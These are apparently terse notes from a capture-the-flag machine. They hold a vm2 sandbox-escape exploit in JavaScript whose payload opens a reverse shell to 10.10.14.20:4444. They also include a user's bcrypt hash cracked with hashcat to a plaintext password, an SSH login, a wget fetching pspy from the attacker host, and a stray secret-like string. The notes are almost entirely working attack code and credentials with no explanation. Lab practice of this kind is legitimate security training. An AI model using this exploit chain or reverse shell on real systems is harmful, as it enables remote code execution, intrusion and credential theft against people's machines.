10.10.11.239


const {VM} = require("vm2");
const vm = new VM();

const code = `
err = {};
const handler = {
    getPrototypeOf(target) {
        (function stack() {
            new Error().stack;
            stack();
        })();
    }
};
  
const proxiedErr = new Proxy(err, handler);
try {
    throw proxiedErr;
} catch ({constructor: c}) {
    c.constructor('return process')().mainModule.require('child_process').execSync('/bin/sh -i >& /dev/tcp/10.10.14.20/4444 0>&1');
}
`

console.log(vm.run(code));

joshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
jhashcat -m 3200 codify.hash /usr/share/wordlists/rockyou.txt --show
$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2:spongebob1
ssh 10.10.11.239 -l joshua
wget http://10.10.14.20/pspy64s
chmod +x pspy64s 

kljh12k3jhaskjh12kjh3

